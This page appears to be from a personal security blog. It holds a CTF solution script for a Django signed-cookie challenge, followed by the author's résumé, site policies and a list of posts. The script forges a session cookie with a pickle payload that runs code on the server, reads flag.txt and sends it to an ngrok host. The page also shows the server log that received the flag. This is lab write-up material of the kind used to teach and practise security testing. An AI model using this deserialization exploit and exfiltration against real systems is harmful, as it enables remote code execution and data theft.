from django.conf import settings as _settings from django.core.signing import loads, dumps from django.contrib.sessions.serializers import PickleSerializer from urllib.request import urlopen import os from sys import argv import requests class Rce(): def __reduce__(self): import requests return (exec,("import requests;s = 'n=1&s=' + open('flag.txt').read();requests.get(f'https://669d-49-34-53-197.in.ngrok.io/hello?{s}');import time;time.sleep(13)",)) # return exec(f'import time;time.sleep(99)') SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!' salt = 'django.contrib.sessions.backends.signed_cookies' c_url = 'http://challenge.nahamcon.com:31050/' cookie = '.eJxNjE0KwjAUhHXhUgRPoZuQ5DWa7MS9Zwj5ebFVaaBpl4IHyDKewytaUaGzGZjvYx6L52v2zb1s8lKboa_1kLDTjS95DiWvJ5s17ortCLb-YtpzJC62fddY8lHIjyZyih5vx7-7mhzUJtUlHwRF9JRKxZgNyqFHIYKUY1dMAefAg6IIaLiVogK2d0h3gJXlAQ04VgbyBgKeP5Q:1nlwXO:fHckutyzxCaT3Hb8w56AHnlhu2_4UmbA7rvjo4tKU7s' _settings.configure() content = loads(cookie, key=SECRET_KEY, serializer=PickleSerializer, salt=salt) print(content) content['testcookie'] = Rce() cookie = dumps(content, key=SECRET_KEY, serializer=PickleSerializer, salt=salt, compress=True) c_cookie = {'csrftoken': 'LUQMdTVnStctjS2xxyX8wGl9CfUHyPiROjEjjlsVFgd0a3MhpJg9XCEAIxTJupw4', 'sessionid': cookie} print(c_cookie) r = requests.get(c_url, cookies=c_cookie) print(r.headers)
we can see our flag in python server we created :

127.0.0.1 - - [06/May/2022 09:24:27] "GET /hello?n=1&s=flag%7Ba6b902e045b669148b5e92f771a68d39%7D HTTP/1.1" 200 - 127.0.0.1 - - [06/May/2022 09:24:42] "GET /hello?n=1&s=flag%7Ba6b902e045b669148b5e92f771a68d39%7D HTTP/1.1" 200 -
flag{a6b902e045b669148b5e92f771a68d39}
Happy Hacking

Mon, 01 Jan 0001 00:00:00 +0000

Aftab Sama

hi@aftabsama.com Aftab700 aftab-sama

Professional Experience

Tata Consultancy Services

Penetration Tester October 2023 - Present

Executed over 100 comprehensive Web, API, Mobile and Thick Client Application penetration tests on staging and production environments while adhering to OWASP, SANS, and PCI-DSS standards, ensuring data security and compliance

Led scope calls with clients for over 50 penetration testing assessments, ensuring alignment with client expectations and project objectives

Effectively communicated technical findings to non-technical stakeholders, facilitating a clear understanding of vulnerabilities and recommended actions

Conducted Configuration Level Vulnerability Assessments (CLVA) for AWS environments, enhancing cybersecurity resilience

Quick Heal

Security Researcher Intern April 2023 - September 2023

Created PoC exploits for RDP and SMB brute force attacks to test antivirus effectiveness

Developed a Python-based log collection tool that reduced manual data gathering time by 75% for the support team

Automated the IoC validation process, enabling the team to process 1000+ IoCs daily, a 10x increase in efficiency

Shadowed on malware cases to learn about the investigation process

KPMG

Security Analyst Intern January 2023 - April 2023

Created technical documentation and executive-level presentations to communicate assessment findings, risk impact, and remediation strategies to clients and internal stakeholders

Automated report generation from PDF to Excel using Python, saving the team an estimated 4 hours of manual work per week

Conducted vulnerability assessments and penetration testing on web applications

Certifications

Certified AppSec Pentesting eXpert (CAPenX) - The SecOps Group (September 2025)

Certified Network Pentester (CNPen) - The SecOps Group (January 2025)

Certified AppSec Pentester (CAPen) - The SecOps Group (January 2025)

Burp Suite Certified Practitioner (BSCP) - PortSwigger (May 2024)

Certified Ethical Hacker (CEH Practical) - EC-Council (September 2023)

Web Penetration Tester Path - HackTheBox

Achievements

NULL Bangalore Speaker

Ranked among the top 100 in TCS HackQuest Season 7 Capture the Flag competition, which led to an employment opportunity with TCS

Ranked among the top performers in a national CTF competition organized by the KPMG Cyber Security Team, leading to an internship opportunity with the Digital Trust-Cyber Defense Incident Response team

Hacker rank on HackTheBox

5th place in WEC CTF 2024 - February 2024

Top 10 in the Wizer CTF event – February 2024

8th place in Anveshanam CTF Organized by IIT Jammu - March 2023

Education

Rashtriya Raksha University

Bachelor of Technology in Computer Science and Engineering (With Specialization in Cyber Security) Jun 2019 - Jun 2023

Technical Skills

Languages: Python (Automation & Scripting) , Go, Bash

Penetration Testing: Linux, Windows, AD, Web, API, Mobile and Thick Client

Cloud: AWS, Docker

Standards & Frameworks: OWASP, SANS, PCI-DSS

Server hardening: Linux

Projects

Check out my Projects on my LinkedIn.

About

Mon, 01 Jan 0001 00:00:00 +0000

“Information is power. But like all power, there are those who want to keep it for themselves.” — Aaron Swartz

$ whoami

Disclaimer

Mon, 01 Jan 0001 00:00:00 +0000

The views expressed on this site are my own and do not reflect those of any individual or entity with which I have been or am currently affiliated with.

Any mention of any individuals or entities on this site is not an endorsement of said individual or entity.

Any site content may be modified, removed, or otherwise altered without notice.

Opinions expressed in a blog post may have changed since its date of publication.

Privacy Policy

Mon, 01 Jan 0001 00:00:00 +0000

This website was created with Hugo a Static Site Generator (SSG) written in Go. It does not use cookies of any kind. This site uses localStorage¹ for the purpose of switching between light and dark themes for UI/UX, with no interaction with the server, only on the client side. There are no forms or other mechanisms that process personal data.

This Website is hosted in Cloudflare Pages. Cloudflare may collect user personal information from visitors to this website, including logs of visitor IP addresses, to comply with legal obligations, and to maintain the security and integrity of the website and the service. See the Cloudflare Privacy Statement for details.²

All external links open in a new tab and by default are told not to send a referrer in the header. I do not use an anonymizing service so that you will know exactly where the link will take you to. Also, I use noopener attribute, which prevents the opening page to gain any kind of access to the original page.

If any external links are missing the rel="external nofollow noopener noreferrer"³ let me know and I’ll update it ASAP.

I will never add user tracking/analytics of any type because I simply do not care. I don’t care how popular the site is or isn’t - it exists for my personal satisfaction.

Apart from this, no data is collected, stored or evaluated. No ads, no tracking/analytics, just my articles to read.

MDN Web Docs: Web Storage API & MDN Web Docs: Local Storage ↩︎

Cloudflare’s Privacy Statement & Cloudflare’s General Data Protection Regulation (GDPR) ↩︎

MDN Web Docs: Link types ↩︎

Aftab Sama

How to Install Arch Linux with KDE

Preparation and Live Environment

Download

Flash

Boot

Connect to Internet

Partitioning the Disk

Identify your drive

Partitioning

Formatting

Installation

Setup mirrors

Base Installation

System Configuration

Enter your new system:

Timezone:

Localization:

Network:

Users:

Bootloader and Desktop Environment

Bootloader (GRUB):

Drivers:

KDE Plasma Installation:

Finishing Up

Optional Packages

Install and Set Up Unbound DNS Server in Arch Linux

Install Unbound

Fetch Root Hints and DNSSEC Key

Directing System Traffic to Unbound

Optional:

Start and Enable the Unbound Service

Verify the Setup

Using “Forward Zones”

DNS blocklist

Troubleshooting

Check Unbound Logs

Certified Network Pentester (CNPen) exam Review

About Exam

My Thoughts on the Exam and Some Tips

nullcon HackIM CTF Goa 2025

Challenges

Bfail

Crahp

Numberizer

Paginator

Sess.io

Certified AppSec Pentester (CAPen) Review + Tips/Tricks

About Exam

What is CAPen

Cost

What is the format of the exam?

What is the pass criteria for the exam?

What is the exam retake policy?

Proctoring

How long is the certificate valid for?

Do they provide Course/Training for Exam?

Mock exams

Tips & Tricks

My Thoughts on the Exam

Reference

Burp Suite Certified Practitioner (BSCP) Review + Tips/Tricks

About Exam

What is BSCP

Cost

Proctoring

How to prepare

Exam structure

Important things to remember

Tips & Tricks

Some Tips

More Tips

My Thoughts on the Exam

Cyberyami Web Warriors

Challenges

Vanish

Antique_cafe

Kevin

Login 1

Login 2

`etc/named.conf` file

`etc/named.conf.local` file

`etc/named.conf.logging` file